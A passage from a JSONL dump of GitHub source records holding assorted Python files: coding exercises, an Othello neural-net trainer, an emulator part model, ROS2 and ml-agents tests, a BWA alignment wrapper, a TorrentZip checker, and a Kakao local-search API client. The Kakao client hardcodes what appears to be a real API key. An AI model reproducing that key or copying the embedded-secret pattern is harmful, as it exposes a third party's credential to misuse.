)\n","repo_name":"sert23/miRNAQC","sub_path":"miRQC/multiqc/modules/cutadapt/cutadapt.py","file_name":"cutadapt.py","file_ext":"py","file_size_in_byte":8542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21687130861","text":"def solution(record):\n answer = []\n message = [] #[['Enter', 'id1', 'Eunji'], ['Leave', 'id1']] 이런 식의 리스트\n uid = dict() #id마다 회원의 닉네임을 저장하기 위한 딕셔너리\n\n for i in record: #message리스트와 uid딕셔너리 저장과정\n message.append(i.split(\" \"))\n if message[-1][0] == \"Enter\" or message[-1][0] == \"Change\": #Enter나 Leave할 때마다 id갱신\n uid[message[-1][1]] = message[-1][2]\n\n for i in message:\n if i[0] == \"Enter\":\n answer.append(uid[i[1]] + \"님이 들어왔습니다.\")\n if i[0] == \"Leave\":\n answer.append(uid[i[1]] + \"님이 나갔습니다.\")\n\n return answer\n","repo_name":"ej970624/Coding_Test_Study","sub_path":"programmers_python/LV2/오픈채팅방.py","file_name":"오픈채팅방.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24134382570","text":"text = input()\nphrases = []\nnumbers = []\ncurrent_phrase = \"\"\ncurrent_num = \"\"\n\nfor i in range(len(text)):\n if not text[i].isnumeric():\n current_phrase += text[i].upper()\n if len(current_num) > 0:\n numbers.append(current_num)\n current_num = \"\"\n else:\n current_num += text[i]\n if len(current_phrase) > 0:\n phrases.append(current_phrase)\n current_phrase = \"\"\n if i == len(text) - 1:\n numbers.append(current_num)\n\nprint(f\"Unique symbols used: 
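The Korean chat-log record above replays messages only after first building an id-to-nickname map, so `Change` events retroactively rename earlier lines. The two-pass idea in miniature (English strings, illustrative only):

```python
# Sketch: two-pass replay — resolve final nicknames first, then render.
record = ["Enter uid1 Muzi", "Enter uid2 Prodo",
          "Leave uid1", "Enter uid1 Prodo", "Change uid2 Ryan"]

uid = {}
events = [line.split() for line in record]
for ev in events:                      # pass 1: the last name wins
    if ev[0] in ("Enter", "Change"):
        uid[ev[1]] = ev[2]

out = []
for ev in events:                      # pass 2: render with final names
    if ev[0] == "Enter":
        out.append(f"{uid[ev[1]]} joined.")
    elif ev[0] == "Leave":
        out.append(f"{uid[ev[1]]} left.")
print(out)
```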
{len(set(''.join(phrases)))}\")\n[print(phrases[x] * int(numbers[x]), end=\"\") for x in range(len(phrases))]\n","repo_name":"1van101/SoftUni-Software-Engineering","sub_path":"python_fundamentals/16_exercise_text_processing/rage_quit.py","file_name":"rage_quit.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73018627025","text":"from libs.othellogame import WHITE, BLACK\ndef state2img(board, player):\n ''' create an image from the given board, from the given player's \n persepctive '''\n good = [1, 0]\n bad = [0, 1]\n neutral = [0, 0]\n\n if player == WHITE:\n piece2vector = [\n neutral, # EMPTY 0\n good, # WHITE 1\n bad, # BLACK -1\n ]\n else:\n piece2vector = [\n neutral, # EMPTY 0\n bad, # WHITE 1\n good, # BLACK -1\n ]\n img = []\n for row in range(10, 90, 10):\n for piece in board[row+1:row+9]:\n img.append(piece2vector[piece])\n return img\n\nimport tensorflow as tf\nfrom tensorflow import keras\n\ndef generate_model():\n '''generate the standard model used for this othello game'''\n model = keras.Sequential([\n keras.layers.Flatten(input_shape=(8*8, 2)),\n keras.layers.Dense(16),\n keras.layers.Dense(1, activation='linear'),\n ])\n model.compile(\n optimizer='adam',\n loss='mean_squared_error',\n metrics=['mean_squared_error']\n )\n return model\n\nfrom libs.util import ProgressBar\n\ndef generate_population(pop_size=16):\n '''Generate a population of models of size pop_size'''\n print(f\"generating population with size {pop_size}...\")\n bar = ProgressBar(pop_size)\n population = []\n for _ in range(pop_size):\n population.append(generate_model())\n bar.update()\n return population\n\n\n''' SERIALIZATION OF DATA '''\ndef serialize_pop(population):\n \"\"\" Serializes the given population along with each of their scores \"\"\"\n return [ agent.get_weights() for agent in population ]\n\ndef deserialize_pop(serialized_pop):\n pop_size = len(serialized_pop)\n population = generate_population(pop_size)\n print(f\"Deserializing pop data...\")\n bar = ProgressBar(pop_size)\n for agent, weights in zip(population, serialized_pop):\n agent.set_weights(weights)\n bar.update()\n return population\n\n\ndef calc_top_k(population, agent2score, p=0.2):\n \"\"\" calculates the top p% of the population that contribute to the total \n score \"\"\"\n running_total = 0\n ordered_costs = [ agent2score[agent] for agent in population ]\n limit = p * sum(map(abs, ordered_costs))\n for top_cut, agent in enumerate(population, start=1):\n running_total += agent2score[agent]\n if running_total > limit:\n return top_cut\n","repo_name":"HeinrichWizardKreuser/othello-tensorflow","sub_path":"research.py","file_name":"research.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70893270865","text":"from part import PartModel, PartFactory\n\nclass P2K8R(PartFactory):\n\n ''' 2KX8 Latched EPROM '''\n\n def state(self, file):\n ''' Extra state variable '''\n\n file.write(\"\\tuint8_t prom[2050];\\n\")\n file.write(\"\\tint last, nxt;\\n\")\n\n def init(self, file):\n ''' Extra initialization '''\n\n file.fmt('''\n\t\t|\tload_programmable(this->name(), state->prom, sizeof state->prom, arg);\n\t\t|\tstate->nxt = 2048;\n\t\t|''')\n\n def doit(self, file):\n ''' The meat of the doit() function '''\n\n super().doit(file)\n\n file.fmt('''\n\t\t|\tconst char *what = NULL;\n\t\t|\tint adr = 0;\n\t\t|\n\t\t|\tif 
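The rage-quit record above splits its input into alternating letter/digit runs by hand; `itertools.groupby` expresses the same split directly:

```python
# Sketch: split text into digit / non-digit runs with groupby.
from itertools import groupby

text = "aSd2&5s@1"
runs = ["".join(chunk) for _, chunk in groupby(text, key=str.isdigit)]
print(runs)  # -> ['aSd', '2', '&', '5', 's@', '1']
```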
(state->nxt >= 0) {\n\t\t|\t\tTRACE(\n\t\t|\t\t << \" CK \" << PIN_CK?\n\t\t|\t\t << \" A \" << BUS_A_TRACE()\n\t\t|\t\t << \" MR_ \" << PIN_MR?\n\t\t|\t\t << std::hex << \" nxt \"\n\t\t|\t\t << state->nxt\n\t\t|\t\t << \" D \"\n\t\t|\t\t << std::hex << (unsigned)state->prom[state->nxt]\n\t\t|\t\t);\n\t\t|\t\tBUS_Y_WRITE(state->prom[state->nxt]);\n\t\t|\t\tstate->last = state->nxt;\n\t\t|\t\tstate->nxt = -1;\n\t\t|\t}\n\t\t|\tif (!PIN_MR=>) {\n\t\t|\t\tif (state->last != 2048)\n\t\t|\t\t\tstate->nxt = 2048;\n\t\t|\t\twhat = \" MR \";\n\t\t|\t} else if (PIN_CK.posedge()) {\n\t\t|\t\tBUS_A_READ(adr);\n\t\t|\t\tif (adr != state->last)\n\t\t|\t\t\tstate->nxt = adr;\n\t\t|\t\twhat = \" CLK \";\n\t\t|\t}\n\t\t|\tif (state->nxt >= 0)\n\t\t|\t\tnext_trigger(5, SC_NS);\n\t\t|''')\n\nclass ModelP2K8R(PartModel):\n ''' P2K8R Rom '''\n\n def assign(self, comp, part_lib):\n assert comp.nodes[\"OE\"].net.is_pd()\n for node in comp:\n if node.pin.name[0] == \"Y\":\n node.pin.set_role(\"output\")\n super().assign(comp, part_lib)\n\n def configure(self, comp, part_lib):\n del comp.nodes[\"OE\"]\n sig = self.make_signature(comp)\n ident = self.name + \"_\" + sig\n if ident not in part_lib:\n part_lib.add_part(ident, P2K8R(ident))\n comp.part = part_lib[ident]\n\ndef register(part_lib):\n ''' Register component model '''\n\n part_lib.add_part(\"P2K8R\", ModelP2K8R(\"P2K8R\"))\n","repo_name":"Datamuseum-DK/R1000.Emulator","sub_path":"NetList/model_p2k8r.py","file_name":"model_p2k8r.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"1957266683","text":"import requests\n\naddress_url = \"https://dapi.kakao.com/v2/local/search/address.json\"\nkeyword_url = \"https://dapi.kakao.com/v2/local/search/keyword.json\"\nimage_url = \"https://dapi.kakao.com/v2/search/image\"\nheaders = {\"Authorization\": \"KakaoAK 26218a6de622d05ea125dffbc73a3c38\"}\n\n\ndef address_to_coords(query: str) -> list:\n new_url = keyword_url + '?query=' + query + '&size=5'\n json = requests.get(new_url, headers=headers).json()\n res = []\n for address in json['documents']:\n res.append(dict(name=address['address_name'],\n x=address['x'], y=address['y']))\n return res\n\n\ndef search_by_keyword(coord: dict, query: str) -> list:\n new_url = keyword_url + '?x=' + str(coord['x']) + \\\n '&y=' + str(coord['y']) + '&query=' + query + '&category_group_code=FD6&size=10'\n json = requests.get(new_url, headers=headers).json()\n candidates = []\n for place in json['documents']:\n # images = fetch_images(query=place['place_name'] + place['address_name'], size=5)\n candidates.append({'place_name': place['place_name'], 'address_name': place['address_name'],\n 'category': place['category_name'], 'url': place['place_url']})\n return candidates\n\n\ndef fetch_images(query: str, size: int) -> list:\n new_url = image_url + '?query=' + str(query) + '&size=' + str(size)\n response = requests.get(new_url, headers=headers).json()\n res = []\n for image_info in response['documents']:\n res.append({'thumbnail_url': image_info['thumbnail_url'], 'image_url': image_info['image_url']})\n return res\n","repo_name":"ahnsv/food-ladder","sub_path":"factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74459040464","text":"import omni.kit.test\nimport omni.kit.usd\nimport gc\nimport omni.graph.core as og\nimport carb\nimport asyncio\n\n# 
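The Kakao client above assembles query strings by concatenation (`url + '?query=' + query + ...`); `requests` can build and URL-escape them via `params=`. A hedged sketch (the Authorization value is a placeholder):

```python
# Sketch: let requests encode the query string instead of concatenating.
import requests

KEYWORD_URL = "https://dapi.kakao.com/v2/local/search/keyword.json"
headers = {"Authorization": "KakaoAK <your-rest-api-key>"}  # placeholder

resp = requests.get(KEYWORD_URL, headers=headers,
                    params={"query": "coffee", "size": 5}, timeout=10)
resp.raise_for_status()
print(resp.json()["documents"][:1])
```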
Import extension python module we are testing with absolute import path, as if we are external user (other extension)\nimport omni.kit.commands\nfrom omni.isaac.core.utils.physics import simulate_async\nfrom .common import get_qos_profile\n\n# Having a test class dervived from omni.kit.test.AsyncTestCase declared on the root of module will make it auto-discoverable by omni.kit.test\nclass TestRos2BridgeCommands(omni.kit.test.AsyncTestCase):\n # Before running each test\n async def setUp(self):\n import rclpy\n\n await omni.usd.get_context().new_stage_async()\n self._timeline = omni.timeline.get_timeline_interface()\n self._stage = omni.usd.get_context().get_stage()\n self._physics_rate = 60\n carb.settings.get_settings().set_bool(\"/app/runLoops/main/rateLimitEnabled\", True)\n carb.settings.get_settings().set_int(\"/app/runLoops/main/rateLimitFrequency\", int(self._physics_rate))\n carb.settings.get_settings().set_int(\"/persistent/simulation/minFrameRate\", int(self._physics_rate))\n await omni.kit.app.get_app().next_update_async()\n self._stage = omni.usd.get_context().get_stage()\n rclpy.init()\n await omni.kit.app.get_app().next_update_async()\n pass\n\n # After running each test\n async def tearDown(self):\n import rclpy\n\n self._stage = None\n self._timeline = None\n rclpy.shutdown()\n gc.collect()\n pass\n\n async def test_sim_clock(self):\n import rclpy\n from rosgraph_msgs.msg import Clock\n\n keys = og.Controller.Keys\n (graph, nodes, _, _) = og.Controller.edit(\n {\"graph_path\": \"/controller_graph\", \"evaluator_name\": \"execution\"},\n {\n keys.CREATE_NODES: [\n (\"OnTick\", \"omni.graph.action.OnTick\"),\n (\"IsaacClock\", \"omni.isaac.core_nodes.IsaacReadSimulationTime\"),\n (\"RosPublisher\", \"omni.isaac.ros2_bridge.ROS2PublishClock\"),\n ],\n keys.CONNECT: [\n (\"OnTick.outputs:tick\", \"RosPublisher.inputs:execIn\"),\n (\"IsaacClock.outputs:simulationTime\", \"RosPublisher.inputs:timeStamp\"),\n ],\n },\n )\n\n self._time_sec = 0\n\n def clock_callback(data):\n self._time_sec = data.clock.sec + data.clock.nanosec / 1.0e9\n\n node = rclpy.create_node(\"test_sim_clock\")\n clock_sub = node.create_subscription(Clock, \"clock\", clock_callback, get_qos_profile())\n\n def spin():\n rclpy.spin_once(node, timeout_sec=0.1)\n\n self._timeline.play()\n\n await simulate_async(2.1, callback=spin)\n self._timeline.stop()\n self.assertGreater(self._time_sec, 2.0)\n spin()\n pass\n\n async def test_sim_clock_manual(self):\n import rclpy\n from rosgraph_msgs.msg import Clock\n\n keys = og.Controller.Keys\n (graph, nodes, _, _) = og.Controller.edit(\n {\"graph_path\": \"/controller_graph\", \"evaluator_name\": \"execution\"},\n {\n keys.CREATE_NODES: [\n (\"Impulse\", \"omni.graph.action.OnImpulseEvent\"),\n (\"IsaacClock\", \"omni.isaac.core_nodes.IsaacReadSimulationTime\"),\n (\"RosPublisher\", \"omni.isaac.ros2_bridge.ROS2PublishClock\"),\n ],\n keys.SET_VALUES: [(\"IsaacClock.inputs:resetOnStop\", True)],\n keys.CONNECT: [\n (\"Impulse.outputs:execOut\", \"RosPublisher.inputs:execIn\"),\n (\"IsaacClock.outputs:simulationTime\", \"RosPublisher.inputs:timeStamp\"),\n ],\n },\n )\n\n self._time_sec = 0\n\n def clock_callback(data):\n self._time_sec = data.clock.sec + data.clock.nanosec / 1.0e9\n\n node = rclpy.create_node(\"test_sim_clock\")\n clock_sub = node.create_subscription(Clock, \"clock\", clock_callback, get_qos_profile())\n\n def spin():\n rclpy.spin_once(node, timeout_sec=0.1)\n\n await simulate_async(1.0, callback=spin)\n self._timeline.play()\n\n await 
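The ROS 2 tests above keep rebuilding the same tiny subscriber around `rclpy.spin_once`; as a standalone sketch (requires a sourced ROS 2 environment to actually run):

```python
# Sketch: minimal rclpy /clock subscriber pumped with spin_once.
import rclpy
from rosgraph_msgs.msg import Clock

rclpy.init()
node = rclpy.create_node("clock_listener")

def on_clock(msg):
    print(msg.clock.sec + msg.clock.nanosec / 1.0e9)

node.create_subscription(Clock, "clock", on_clock, 10)
for _ in range(10):  # pump callbacks a few times
    rclpy.spin_once(node, timeout_sec=0.1)
node.destroy_node()
rclpy.shutdown()
```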
omni.kit.app.get_app().next_update_async()\n self.assertEqual(self._time_sec, 0.0)\n og.Controller.attribute(\"/controller_graph/Impulse.state:enableImpulse\").set(True)\n # after first step we need to wait for ros node to initialize\n await simulate_async(1.0, callback=spin)\n\n og.Controller.attribute(\"/controller_graph/Impulse.state:enableImpulse\").set(True)\n # wait for message\n await simulate_async(1.0, callback=spin)\n self.assertGreater(self._time_sec, 0.0)\n\n self._timeline.stop()\n spin()\n pass\n\n async def test_system_clock(self):\n import rclpy\n from rosgraph_msgs.msg import Clock\n import time\n\n keys = og.Controller.Keys\n (graph, nodes, _, _) = og.Controller.edit(\n {\"graph_path\": \"/controller_graph\", \"evaluator_name\": \"execution\"},\n {\n keys.CREATE_NODES: [\n (\"OnTick\", \"omni.graph.action.OnTick\"),\n (\"IsaacClock\", \"omni.isaac.core_nodes.IsaacReadSystemTime\"),\n (\"RosPublisher\", \"omni.isaac.ros2_bridge.ROS2PublishClock\"),\n ],\n keys.CONNECT: [\n (\"OnTick.outputs:tick\", \"RosPublisher.inputs:execIn\"),\n (\"IsaacClock.outputs:systemTime\", \"RosPublisher.inputs:timeStamp\"),\n ],\n },\n )\n self._time_sec = 0\n\n def clock_callback(data):\n self._time_sec = data.clock.sec + data.clock.nanosec / 1.0e9\n\n node = rclpy.create_node(\"test_sim_clock\")\n clock_sub = node.create_subscription(Clock, \"clock\", clock_callback, get_qos_profile())\n\n def spin():\n rclpy.spin_once(node, timeout_sec=0.1)\n\n self._timeline.play()\n\n await simulate_async(1.0, callback=spin)\n self.assertAlmostEqual(self._time_sec, time.time(), delta=0.5)\n self._timeline.stop()\n spin()\n pass\n","repo_name":"swadaskar/Isaac_Sim_Folder","sub_path":"exts/omni.isaac.ros2_bridge-humble/omni/isaac/ros2_bridge/tests/test_clock.py","file_name":"test_clock.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73350652946","text":"\"\"\"Next-gen alignments with BWA (http://bio-bwa.sourceforge.net/)\n\"\"\"\nimport os\nimport subprocess\n\nfrom bcbio.log import logger\nfrom bcbio.pipeline import config_utils\nfrom bcbio.utils import file_exists\nfrom bcbio.distributed.transaction import file_transaction\n\ngalaxy_location_file = \"bwa_index.loc\"\n\ndef align(fastq_file, pair_file, ref_file, out_base, align_dir, config,\n rg_name=None):\n \"\"\"Perform a BWA alignment, generating a SAM file.\n \"\"\"\n sai1_file = os.path.join(align_dir, \"%s_1.sai\" % out_base)\n sai2_file = (os.path.join(align_dir, \"%s_2.sai\" % out_base)\n if pair_file else None)\n sam_file = os.path.join(align_dir, \"%s.sam\" % out_base)\n if not file_exists(sam_file):\n if not file_exists(sai1_file):\n with file_transaction(sai1_file) as tx_sai1_file:\n _run_bwa_align(fastq_file, ref_file, tx_sai1_file, config)\n if sai2_file and not file_exists(sai2_file):\n with file_transaction(sai2_file) as tx_sai2_file:\n _run_bwa_align(pair_file, ref_file, tx_sai2_file, config)\n align_type = \"sampe\" if sai2_file else \"samse\"\n sam_cl = [config_utils.get_program(\"bwa\", config), align_type, ref_file, sai1_file]\n if sai2_file:\n sam_cl.append(sai2_file)\n sam_cl.append(fastq_file)\n if sai2_file:\n sam_cl.append(pair_file)\n with file_transaction(sam_file) as tx_sam_file:\n with open(tx_sam_file, \"w\") as out_handle:\n logger.info(\" \".join(sam_cl))\n subprocess.check_call(sam_cl, stdout=out_handle)\n return sam_file\n\ndef _bwa_args_from_config(config):\n cores = config.get(\"resources\", {}).get(\"bwa\", 
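The BWA wrapper above shells out with `subprocess.check_call` and redirects stdout into the target file; that redirection pattern on its own:

```python
# Sketch: run an external command, capturing stdout into a file.
import subprocess

cmd = ["python", "--version"]  # placeholder for an aligner command line
with open("output.txt", "w") as out:
    subprocess.check_call(cmd, stdout=out)  # raises on non-zero exit
```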
{}).get(\"cores\", None)\n core_flags = [\"-t\", str(cores)] if cores else []\n qual_format = config[\"algorithm\"].get(\"quality_format\", \"\").lower()\n qual_flags = [\"-I\"] if qual_format == \"illumina\" else []\n return core_flags + qual_flags\n\ndef _run_bwa_align(fastq_file, ref_file, out_file, config):\n aln_cl = [config_utils.get_program(\"bwa\", config), \"aln\",\n \"-n %s\" % config[\"algorithm\"][\"max_errors\"],\n \"-k %s\" % config[\"algorithm\"][\"max_errors\"]]\n aln_cl += _bwa_args_from_config(config)\n aln_cl += [ref_file, fastq_file]\n with open(out_file, \"w\") as out_handle:\n logger.info(\" \".join(aln_cl))\n subprocess.check_call(aln_cl, stdout=out_handle)\n\n","repo_name":"chapmanb/bcbb","sub_path":"nextgen/bcbio/ngsalign/bwa.py","file_name":"bwa.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":580,"dataset":"github-code","pt":"48"} +{"seq_id":"71704774547","text":"\"\"\" Given an integer array nums, find the contiguous subarray (containing at least one number) which has the largest sum and return its sum.\n\nA subarray is a contiguous part of an array. \"\"\"\n\nclass Solution:\n def maxSubArray(self, nums: List[int]) -> int:\n # set value for maximum sum and the current sum\n max_sum = nums[0]\n curr_sum = 0\n \n # loop over nums and calculate curr_sum and max_sum\n for num in nums:\n # if the sum is a negative value, we don't want to keep it\n if curr_sum < 0:\n curr_sum = 0\n # add the next num \n curr_sum += num\n # find the max sum\n max_sum = max(max_sum, curr_sum)\n \n return max_sum\n ","repo_name":"kotynskm/leetcode","sub_path":"maxsubarray.py","file_name":"maxsubarray.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31308469940","text":"import pytest\nimport yaml\nfrom unittest.mock import MagicMock, patch, mock_open\nfrom mlagents.trainers import learn\nfrom mlagents.trainers.trainer_controller import TrainerController\nfrom mlagents.trainers.learn import parse_command_line\nfrom mlagents.trainers.cli_utils import DetectDefault\nfrom mlagents_envs.exception import UnityEnvironmentException\nfrom mlagents.trainers.stats import StatsReporter\nfrom mlagents.trainers.environment_parameter_manager import EnvironmentParameterManager\nimport os.path\n\n\ndef basic_options(extra_args=None):\n extra_args = extra_args or {}\n args = [\"basic_path\"]\n if extra_args:\n args += [f\"{k}={v}\" for k, v in extra_args.items()]\n return parse_command_line(args)\n\n\nMOCK_YAML = \"\"\"\n behaviors:\n {}\n \"\"\"\n\nMOCK_INITIALIZE_YAML = \"\"\"\n behaviors:\n {}\n checkpoint_settings:\n initialize_from: notuselessrun\n \"\"\"\n\nMOCK_PARAMETER_YAML = \"\"\"\n behaviors:\n {}\n env_settings:\n env_path: \"./oldenvfile\"\n num_envs: 4\n num_areas: 4\n base_port: 4001\n seed: 9870\n checkpoint_settings:\n run_id: uselessrun\n initialize_from: notuselessrun\n debug: false\n \"\"\"\n\n\n@patch(\"mlagents.trainers.learn.write_timing_tree\")\n@patch(\"mlagents.trainers.learn.write_run_options\")\n@patch(\"mlagents.trainers.learn.validate_existing_directories\")\n@patch(\"mlagents.trainers.learn.TrainerFactory\")\n@patch(\"mlagents.trainers.learn.SubprocessEnvManager\")\n@patch(\"mlagents.trainers.learn.create_environment_factory\")\n@patch(\"mlagents.trainers.settings.load_config\")\ndef test_run_training(\n load_config,\n create_environment_factory,\n subproc_env_mock,\n trainer_factory_mock,\n handle_dir_mock,\n 
write_run_options_mock,\n write_timing_tree_mock,\n):\n mock_env = MagicMock()\n mock_env.external_brain_names = []\n mock_env.academy_name = \"TestAcademyName\"\n create_environment_factory.return_value = mock_env\n load_config.return_value = yaml.safe_load(MOCK_INITIALIZE_YAML)\n mock_param_manager = MagicMock(return_value=\"mock_param_manager\")\n mock_init = MagicMock(return_value=None)\n with patch.object(EnvironmentParameterManager, \"__new__\", mock_param_manager):\n with patch.object(TrainerController, \"__init__\", mock_init):\n with patch.object(TrainerController, \"start_learning\", MagicMock()):\n options = basic_options()\n learn.run_training(0, options, 1)\n mock_init.assert_called_once_with(\n trainer_factory_mock.return_value,\n os.path.join(\"results\", \"ppo\"),\n \"ppo\",\n \"mock_param_manager\",\n True,\n 0,\n )\n handle_dir_mock.assert_called_once_with(\n os.path.join(\"results\", \"ppo\"),\n False,\n False,\n os.path.join(\"results\", \"notuselessrun\"),\n )\n write_timing_tree_mock.assert_called_once_with(\n os.path.join(\"results\", \"ppo\", \"run_logs\")\n )\n write_run_options_mock.assert_called_once_with(\n os.path.join(\"results\", \"ppo\"), options\n )\n StatsReporter.writers.clear() # make sure there aren't any writers as added by learn.py\n\n\ndef test_bad_env_path():\n with pytest.raises(UnityEnvironmentException):\n factory = learn.create_environment_factory(\n env_path=\"/foo/bar\",\n no_graphics=True,\n seed=-1,\n num_areas=1,\n timeout_wait=1,\n start_port=8000,\n env_args=None,\n log_folder=\"results/log_folder\",\n )\n factory(worker_id=-1, side_channels=[])\n\n\n@patch(\"builtins.open\", new_callable=mock_open, read_data=MOCK_YAML)\ndef test_commandline_args(mock_file):\n # No args raises\n # with pytest.raises(SystemExit):\n # parse_command_line([])\n # Test with defaults\n opt = parse_command_line([\"mytrainerpath\"])\n assert opt.behaviors == {}\n assert opt.env_settings.env_path is None\n assert opt.checkpoint_settings.resume is False\n assert opt.checkpoint_settings.inference is False\n assert opt.checkpoint_settings.run_id == \"ppo\"\n assert opt.checkpoint_settings.initialize_from is None\n assert opt.env_settings.seed == -1\n assert opt.env_settings.base_port == 5005\n assert opt.env_settings.num_envs == 1\n assert opt.env_settings.num_areas == 1\n assert opt.engine_settings.no_graphics is False\n assert opt.debug is False\n assert opt.env_settings.env_args is None\n\n full_args = [\n \"mytrainerpath\",\n \"--env=./myenvfile\",\n \"--inference\",\n \"--run-id=myawesomerun\",\n \"--seed=7890\",\n \"--train\",\n \"--base-port=4004\",\n \"--initialize-from=testdir\",\n \"--num-envs=2\",\n \"--num-areas=2\",\n \"--no-graphics\",\n \"--debug\",\n ]\n\n opt = parse_command_line(full_args)\n assert opt.behaviors == {}\n assert opt.env_settings.env_path == \"./myenvfile\"\n assert opt.checkpoint_settings.run_id == \"myawesomerun\"\n assert opt.checkpoint_settings.initialize_from == \"testdir\"\n assert opt.env_settings.seed == 7890\n assert opt.env_settings.base_port == 4004\n assert opt.env_settings.num_envs == 2\n assert opt.env_settings.num_areas == 2\n assert opt.engine_settings.no_graphics is True\n assert opt.debug is True\n assert opt.checkpoint_settings.inference is True\n assert opt.checkpoint_settings.resume is False\n\n # ignore init if resume is set\n full_args.append(\"--resume\")\n opt = parse_command_line(full_args)\n assert opt.checkpoint_settings.initialize_from is None # ignore init if resume set\n assert 
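The trainer test above stacks `@patch` decorators with nested `patch.object` context managers; the core move in miniature:

```python
# Sketch: patch.object swaps a method for a MagicMock inside the block only.
from unittest.mock import MagicMock, patch

class Trainer:
    def start_learning(self):
        raise RuntimeError("expensive!")

with patch.object(Trainer, "start_learning", MagicMock(return_value=None)) as m:
    Trainer().start_learning()  # the mock runs, not the real method
    m.assert_called_once()
# outside the block the real (raising) method is restored
```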
opt.checkpoint_settings.resume is True\n\n\n@patch(\"builtins.open\", new_callable=mock_open, read_data=MOCK_PARAMETER_YAML)\ndef test_yaml_args(mock_file):\n # Test with opts loaded from YAML\n DetectDefault.non_default_args.clear()\n opt = parse_command_line([\"mytrainerpath\"])\n assert opt.behaviors == {}\n assert opt.env_settings.env_path == \"./oldenvfile\"\n assert opt.checkpoint_settings.run_id == \"uselessrun\"\n assert opt.checkpoint_settings.initialize_from == \"notuselessrun\"\n assert opt.env_settings.seed == 9870\n assert opt.env_settings.base_port == 4001\n assert opt.env_settings.num_envs == 4\n assert opt.env_settings.num_areas == 4\n assert opt.engine_settings.no_graphics is False\n assert opt.debug is False\n assert opt.env_settings.env_args is None\n # Test that CLI overrides YAML\n full_args = [\n \"mytrainerpath\",\n \"--env=./myenvfile\",\n \"--resume\",\n \"--inference\",\n \"--run-id=myawesomerun\",\n \"--seed=7890\",\n \"--train\",\n \"--base-port=4004\",\n \"--num-envs=2\",\n \"--num-areas=2\",\n \"--no-graphics\",\n \"--debug\",\n \"--results-dir=myresults\",\n ]\n\n opt = parse_command_line(full_args)\n assert opt.behaviors == {}\n assert opt.env_settings.env_path == \"./myenvfile\"\n assert opt.checkpoint_settings.run_id == \"myawesomerun\"\n assert opt.env_settings.seed == 7890\n assert opt.env_settings.base_port == 4004\n assert opt.env_settings.num_envs == 2\n assert opt.env_settings.num_areas == 2\n assert opt.engine_settings.no_graphics is True\n assert opt.debug is True\n assert opt.checkpoint_settings.inference is True\n assert opt.checkpoint_settings.resume is True\n assert opt.checkpoint_settings.results_dir == \"myresults\"\n\n\n@patch(\"builtins.open\", new_callable=mock_open, read_data=MOCK_YAML)\ndef test_env_args(mock_file):\n full_args = [\n \"mytrainerpath\",\n \"--env=./myenvfile\",\n \"--env-args\", # Everything after here will be grouped in a list\n \"--foo=bar\",\n \"--blah\",\n \"baz\",\n \"100\",\n ]\n\n opt = parse_command_line(full_args)\n assert opt.env_settings.env_args == [\"--foo=bar\", \"--blah\", \"baz\", \"100\"]\n","repo_name":"Unity-Technologies/ml-agents","sub_path":"ml-agents/mlagents/trainers/tests/test_learn.py","file_name":"test_learn.py","file_ext":"py","file_size_in_byte":8038,"program_lang":"python","lang":"en","doc_type":"code","stars":15647,"dataset":"github-code","pt":"48"} +{"seq_id":"4116088458","text":"import os, struct, zipfile, zlib\n\nif __name__ == '__main__':\n from torrentarchive import TorrentArchive\nelse:\n from .torrentarchive import TorrentArchive\n\ndef log(*args):\n print('[TORRENTZIP]', *args)\n\ndef d(s):\n print(\"DEBUG: %s\" % s)\n\ndef e(s):\n print(\"ERROR: %s\" % s)\n\nclass TorrentZip(TorrentArchive):\n def __init__(self, archive_filename):\n super().__init__(archive_filename)\n \n # Collect contents\n z = zipfile.ZipFile(archive_filename, mode='r')\n entries = []\n dir_count = 0\n file_count = 0\n # infolist() maintains archive order\n for f in z.infolist():\n if f.is_dir():\n dir_count += 1\n type = 'dir'\n else:\n file_count += 1\n type = 'reg'\n entries.append({'path': f.filename, 'size': f.file_size, 'type': type})\n\n self.contents = {'entries': entries, 'dir_count': dir_count, 'file_count': file_count}\n\n def signature_is_present(self, filename=None):\n if not filename:\n filename = self.archive_filename\n with open(filename, \"rb\") as f:\n f.seek(-22, os.SEEK_END)\n buf = f.read(13)\n if not buf:\n return False\n return struct.unpack(\"<13s\", buf)[0] == b'TORRENTZIPPED'\n\n def 
signature_is_valid(self, filename=None):\n if not filename:\n filename = self.archive_filename\n current_sig = self._get_tzip_signature(filename)\n actual_sig = self._generate_signature(filename)\n return current_sig == actual_sig\n\n def get_archive_contents(self):\n return self.contents\n\n def sign(self, path=None):\n if not path:\n path = self.archive_filename\n\n current_sig = self._get_tzip_signature(path)\n actual_sig = self._generate_signature(path)\n\n if current_sig:\n if current_sig == actual_sig:\n print(\"Existing signature is valid; skipping signing\")\n return True\n else:\n print(\"Signature mismatch! Re-signing.\", current_sig, actual_sig)\n else:\n print(\"No signature present; signing.\")\n\n # update signature\n with open(path, 'r+b') as z:\n z.seek(-22, 2)\n z.write(struct.pack(\"<22s\", actual_sig))\n\n return True\n\n def _get_tzip_signature(self, filename):\n with open(filename, 'rb') as z:\n z.seek(-22, 2)\n sig = struct.unpack(\"<22s\", z.read(22))[0]\n if not sig.startswith(b'TORRENTZIPPED-'):\n return False\n return sig\n\n def _generate_signature(self, filename):\n zip64 = False\n if os.path.getsize(filename) > 0xFFFFFFFF:\n zip64 = True\n\n z = zipfile.ZipFile(filename, mode='r', allowZip64=True)\n\n # synthesize the central directory\n entries = 